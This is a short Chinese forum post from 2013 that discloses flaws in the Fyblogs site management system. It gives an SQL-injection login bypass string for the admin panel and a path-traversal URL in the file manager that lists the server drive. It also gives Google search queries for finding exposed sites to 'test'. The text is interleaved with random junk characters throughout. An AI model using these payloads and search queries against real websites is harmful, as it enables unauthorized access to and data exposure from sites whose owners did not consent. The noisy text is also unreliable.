漏洞类型: 未授权访问/权限绕过
+ r+ Y! q2 C7 w% j) w0 ~7 o1 u# l7 x) J* e( T( i
简要描述:
8 E9 C! {. N; S: k
9 k' P) y* V2 A5 cFyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!) v x( V. j, x- {" X
1 z) \+ j- x: W: I详细说明:0 b& o6 h. k* C, M; n
5 S5 Y+ P( w: Q5 j' {( Z后台万能密码 'or'='or'
p+ x: W$ x7 c7 r6 B; a) U后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!# h5 }9 |2 D# f! ^1 ~ o! V }
admin/uploadfile.asp?currentFolder=/upfiles/../
4 G: S5 F9 m7 `: F
. l8 A9 [8 P" ^3 i, D漏洞证明:
) S- k) `( q3 ~2 _0 Z3 [
" `0 G, z) k4 {0 k2 G5 n谷歌:inurl:type.asp?id=1 新闻中心
! |* I% ?- d2 Q/ T+ o' g% H1 t或者 :inurl:download_ok.asp?" B% I, Z. }& O+ W: u
- Z2 ^+ y/ T* O% n- b可以测试
( ] R- [3 B5 g6 \' I
) I- }, U1 `# H0 C$ E3 \0 S; l; Q, z4 l
|
发表于 2013-3-7 13:07:46
收藏
分享
支持
反对